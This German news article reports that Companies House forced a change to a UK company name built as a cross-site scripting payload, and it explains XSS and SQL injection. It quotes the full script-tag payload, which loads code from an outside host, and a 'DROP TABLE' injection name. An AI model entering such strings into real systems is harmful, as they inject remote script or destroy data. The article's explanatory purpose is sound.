Der Firmenname eines englischen Unternehmens wurde von der zuständigen britischen Behörde verboten. Das Unternehmen versuchte einen Firmennamen zu wählen, der wie ein klassischer Cross-Site-Scripting-Angriff (XSS) aussieht. Durch die Verwendung dieses Firmennamen hätte Code in fremden Webseiten injiziert werden können.
Unternehmensname führt zu XSS
Das englische Unternehmen „><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD wurde nun aufgefordert, diesen Firmennamen zu ändern. Für IT-Sicherheitsexperten ist es offensichtlich, warum die englische Behörde Companies House, die für das dortige Handelsregister zuständig ist, diesen Firmennamen verboten ist. Durch die seltsame Syntax, die durch sich öffnende Anführungszeichen startet, welche jedoch nie geschlossen werden, zeigen sich typische Cross-Site-Scripting-Angriffe.
Ein Cross-Site-Scripting-Angriff versucht eigenen Code auf eine Webseite zu injizieren, sodass dieser von anderen Besuchern dieser Webseite ausgeführt werden. Dadurch wurden in der Vergangenheit häufig Daten geklaut, aber auch sensible Informationen ausgelesen. Es wird zwischen drei verschiedenen XSS unterschieden, diese sind Reflektierte XSS-, Persistente XSS-, DOM-basierte XSS-Angriffe. XSSStrike ist ein XSS-Scanner der Sicherheitslücken findet, die eine der drei XSS-Angriffe zulässt.
Besonders häufig kommen solche XSS-Angriffe in den Suchfeldern oder Log-In-Masken vor, da auf vielen Webseiten die Nutzereingaben nicht korrekt validiert werden. Generell sind Nutzereingaben ein häufiges Problem für die IT-Sicherheit, denn sobald Nutzer Suchbegriffe eingeben, die von dem Programmierer nicht erwartet werden, wie bspw. der oben genannte Firmenname, werden häufig viele verschiedene Informationen preisgegeben.
Der Firmengründer des englischen Unternehmens, welches nun Ihren Firmennamen ändern müssen, teilte der britischen Zeitung Guardian mit, dass er lediglich einen lustigen, verspielten Namen wählen wollte und sich nicht über das Sicherheitsrisiko im Klaren war. Zwar führt der Firmenname nicht zu einem großen Schaden, da lediglich eine Warnmeldung ausgegeben wird, dennoch könnte durch die Verwendung dieses Namen eine Sicherheitslücke entdeckt werden.
Mittlerweile wurde die britische Beratungsfirma zu „That Company whose Name used to contain HTML Script Tags LTD“ übersetzt bedeutet dies „Die Firma, deren Name früher HTML-Script-Tags enthielt LTD“.
Firmenname verboten – Nicht das erste Mal
Es ist nicht das erste Mal, dass ein Firmenname verboten wurde, da dieser ein Sicherheitsrisiko darstellt. Ein Unternehmen mit dem Namen „; DROP TABLE „COMPANIES“;– LTD“ wurde laut Guardian jedoch nicht vollständig verboten. Dieser Firmenname befindet sich noch in genau dieser Form im Handelsregister, ist dort dementsprechend für alle Besucher einsichtbar.
Bei diesem Namen handelt es sich um ein Sicherheitsrisiko für eine SQL-Injection. Hierbei geht es darum, dass durch die Datenbanksprache SQL eine Anfrage zu manipuliert wird, dass in diesem Beispiel die Tabelle mit dem Namen „COMPANIES“ gelöscht werden soll. Vergleichbar wie ein XSS-Angriff, befinden sich SQL-Schwachstellen ebenfalls in Nutzereingabefeldern.
https://www.youtube.com/watch?v=l7BG_XPLBj8
In diesem Video wird eine SQL-Schwachstelle sehr gut beschrieben, sodass Sie im Anschluss überprüfen können, ob Ihre Firma ebenfalls von solchen Schwachstellen betroffen ist.